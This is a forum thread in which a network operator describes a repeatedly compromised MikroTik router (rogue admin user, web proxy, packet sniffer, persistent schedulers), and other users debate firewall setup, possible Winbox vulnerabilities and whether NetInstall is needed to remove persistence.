I have a RB that has been attacked twice in two months.
I don’t have an export, but:
RB is dst-natted with port 8292 to 8291
There’s a simple firewall that drops invalid connection, then accepts connections from src-address list, accepts icmp, established, related and drops input.
Only winbox, telnet, ssh and api services are enabled (but only 8291 is reachable from Internet).
ROS 6.43.8
The RB has been attacked by someone that:
Added an user called “admin” with group full
redirected port 80 requests to port 8080
Set up a Web Proxy
Sniffed all interfaces sending file to 185.21.109.18
Perhaps you should not use the word vulnerability until it is confirmed …
Until now you can only name it “hacked” …
And the reason for that is not clear
ps,
send email to support@mikrotik.com for help, this is a user forum, not a support forum
well we know for a fact that in the previous version winbox has vulnerability. opening this to the world is like waiting for this to happen. What you said may or may not be true.
You should setup VPN instead like PPTP, OVPN. etc.much safer
If the reason is unknown, it’s not an hack until you spot what’s wrong in config
I have the same config everywhere
Winbox is not open to the world, I have an accept rule with src-address list public IPs that I use to connect (exactly 4) to connect.
Everything in input is dropped except for ICMP, port 2000 for bandwidth test, established, related and broadcast connection, DNS only for LAN interfaces.
The only port exposed to the Internet is 8291, the RB hasn’t got a public IP, plus it has a firewall that should drop everything and accept only 8291 connections from address list.
How can I be hacked? For God’s sake, one port opened, with firewall, it’s obviously a vulnerability.
Router has been hacked using a vulnerability before 6.43.8, should I NetInstall it?
Edited the title by the way.
Winbox isn’t open to the Internet, I have a firewall that accepts only connections from my address list.
I don’t use port knocking.
I don’t need VPN access for this, I’m the ISP of the customer.
Yes, but I don’t know if it’s the same vulnerability that has been spotted in April, I already found alexey attacks that blocks that vulnerability with firewall, but this isn’t the case.
Currently there is no new known winbox port vulnerabilities.
If you are sure that after first hack you reinstalled the router rand changed login credentials, then contact support.
There are cases that routers get “hacked” even after upgrade, because already stolen credentials was not changed.
mrz, are you sure you are MT support LOL. From all my simple readings, a re-install does not cure a properly hacked unit (from the hackers perspective), one needs to do a NET INSTALL (which I gather erases memory that a normal reinstall doesn’t touch??)
Sorry to hear about your issue Redmond. However, for router access, I wouldnt count on source list protection as being a good security practice. Perhaps with a server of some sort that is isolated from ones LAN, that may be sufficient and assuming that the server has credentials login, BUT to the router NO EFFING WAY.
I just wanted to comment on you seemed to indicate that you made an accept rule for your address list??
You should do that all on the NAT rule…
ex.
add action=dst-nat chain=dstnat comment=Solar_UDP dst-port=zz
in-interface-list=WAN log=yes protocol=udp **src-address-list=**Solar_Panel
to-addresses=192.168.z.zz
Anav … should mrz explain again and again and step by step what to do when you are hacked or could expect that autor is aware of https://blog.mikrotik.com/
If you are talking about malware, then :
“Simply upgrading RouterOS software deletes the malware, any other 3rd party files and closes the vulnerability”
If you are talking about configuration change then of course those need to be corrected or router should be netinstalled and configured from scratch.
Concur Bartoz, of course the OP should have his … … whacked for not using netinstall after being hacked in the past. This has been documented on almost every thread on the subject and in the blog and and and and and… Furthermore relying on source address list protection for the router is cwazee!! At least for {insert your deity of choice} sake use the minimum of port-knock lol. But for the supposed MT support person to be ‘loose’ with lingo, hmmm perhaps he needs remedial training as re-install is not = net install.
No hard feelings mrz, nothing that cannot be solved by a few shots of schapps (probably two for me and i would be under the table).
In this particular case I have a dst-nat with dst-port 8292 and to-ports 8291 (for example to-addresses 192.168.88.2) and no other ports forwarded.
Then I have in 192.168.88.2 an address list with my public IP, an accept rule chain input, src address list the one with my IP, action accept (everything that comes from my public IP), then rules like defconf firewall, plus ICMP accept input and TCP 2000 accept for bandwidth tests.
If I set an address list in dst-nat I should avoid the hack, unless the hacker doesn’t try to hack the RB that is natting, in that case I have the same problem.
I don’t know if adding allowed addresses to local users would solve the problem, I don’t know if hacker had got my password or used a vulnerability that avoids login (no log because of hacker’s scripts).
I obviously can’t NetInstall every RB that I have around and updating RBs that are more than 100km far away it’s always a risk, so I can’t do that for 3000+ RBs at the same time and then run to change them in case of bootloop or something else.
I need to be sure what vulnerability has been used (as I said, it has been attacked before 6.43.8, didn’t know until today) and then modify my firewall to prevent.
So I’m asking if someone experienced an hack like this and all informations about it.
I’ve also found schedulers that on startup and everyday fetch again hacker’s files and there was also a packet sniffer.
“Regardless of version used, all RouterOS versions that have the default firewall enabled, are not vulnerable”
I want to know what makes defconf firewall secure and not mine, but if someone from support said that defconf firewall is secure and this one has everything that makes it as secure as defconf one, then if defconf firewall is secure things are two:
Defconf firewall isn’t secure
There’s a new vulnerability
I have been attacked twice in this RB and some others from another hacker (alexey), every RB has got this firewall:
In code ether1 is LAN interface.
admin address list has got some public and private IPs that are used for API, my Winbox connection and Dude monitoring.
If you have any suggestions please post as config.
Defconf doesn’t protect device from within. If you were hacked a year ago, cleared the config but left one script in the device, it could have reconfigured itself even after you installed a better firewall and upgraded.
Is my firewall as sure as denconf? Please tell me what do you think.
Replies
I set the firewall on the public interface
The device has got the firewall I’ve posted, even if it’s behind NAT.
I’ve found other RBs hacked, after removing all unusual config and updated they have been hacked again.
In all cases, I have this firewall, it’s very similar to defconf one, so if the thing written in blog.mikrotik.com it’s true, there’s another problem.
Just tell me if this firewall is as secure as defconf one, remember that src-address-list admin contains only 3 public IPs that I use.
Normis has made it quite clear that a router out of the box is good to go regarding security from the public interface.
In other words, it can be used without concern of hacking from external sources.
If the admin then changes the rules and for examples ADDS external access in an unsafe manner, then the router could be hackable. From my readings this was one of the major problems with many of the MT reported hacks.
If the admin does not secure access to the router internally and a device behind the router is hacked due to phishing, going to unsafe sites etc, then
the router could be vulnerable from the inside but I am not sure how that happens. There are easy ways to mitigate this…
Most people only allow specific LAN IPs to winbox. They use a different username and password from the default etc…
Finally and this is the point you keep missing, if the router has been hacked in the past, changing the config, re-setting to defaults, updating to the latest firmware WILL PROBABLY NOT WORK to remove the hack.
You need to use NET INSTALL which wipes internal memory not touched by all the other methods.
In summary, your FW can be the most elegant setup in the world, the safest and most secure setup ever, but its completely useless if NET INSTALL was not used, as the bad guy has a backdoor into your router sitting there waiting for you to turn the unit on and connect to the net.
